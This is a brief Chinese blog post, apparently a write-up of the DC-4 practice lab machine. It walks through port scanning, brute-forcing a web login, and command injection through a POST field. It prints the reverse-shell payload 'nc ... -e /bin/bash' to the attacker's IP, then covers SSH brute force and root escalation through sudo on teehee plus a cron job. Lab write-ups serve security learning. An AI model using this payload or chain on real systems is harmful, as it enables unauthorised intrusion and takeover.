DC4靶机
2024-10-09 19:03:28
DC-4靶机渗透
扫描内网机器,看到143是开启的,那么ok了,确定了目标主机的地址。
对其进行进一步的端口扫描,80,22端口都是开放的。
访问具体网页,进行爆破,分别为admin,happy。
里面能够执行三种命令,看一下中间的包,发现命令直接进行了显示,那可以直接构造反弹shell了,当前身份是在www-data目录下
radio=nc+192.168.114.128+9090+-e+/bin/bash&submit=Run
反弹成功,利用python进入交互模式:
查找了三个用户,在jim用户目录下看到了password的密码本。
利用密码本进行ssh的爆破
进入之后看到一封信,可以知道用户跟密码了
登陆以后发现能以root身份执行 /usr/bin/teehee
可以利用teehee进行提权,执行定时计划,成功提权。
最新文章
- Oracle 的基本操作符
- 修改github.com域名解析
- webapi filter过滤器中获得请求的方法详情(方法名,Attributes)
- 问题:无法获得锁 /var/lib/dpkg/lock - open (11: 资源临时不可用)
- Asset Catalog Help (二)---Creating an Asset Catalog
- Hadoop第10周练习—Mahout部署及进行20newsgroup数据分析例子
- Java基础-常量池
- java正则表达式取括号里面的内容
- ZOJ-3929 Deque and Balls (DP+找规律)
- Verilog
- python学习之js从0开始
- Delphi 之弹出气泡消息提示
- 4412 uboot上手
- ubuntu 安装Pangolin 过程
- CentOS7安装OpenStack(Rocky版)-09.安装Cinder存储服务组件(控制节点)
- Django(4)
- EditorUtility类的说明
- AndroidStudio build.gradle 报错
- Windows网络编程系列教程之四:Select模型
- ubuntu - 14.04,解决Gnome桌面右键菜单失效问题!
热门文章
- 操作系统-I/O(6)I/O与系统调用
- web渗透测试之sqlmap拿到数据库信息
- 访问github太慢?我写了一个开源小工具一键变快
- 【译】Introducing “Web Live Preview”
- 【Go语言入门系列】(七)如何使用Go的方法?
- python爬取酷我音乐(收费也可)
- 【Android】Android开发初学者实现拨打电话的功能,拨打电话app小demo实现
- Single Shot MultiBox Detector论文翻译【修改】
- Web测试和前端技术
- Kubernetes v1.12/v1.13 二进制部署集群(HTTPS+RBAC)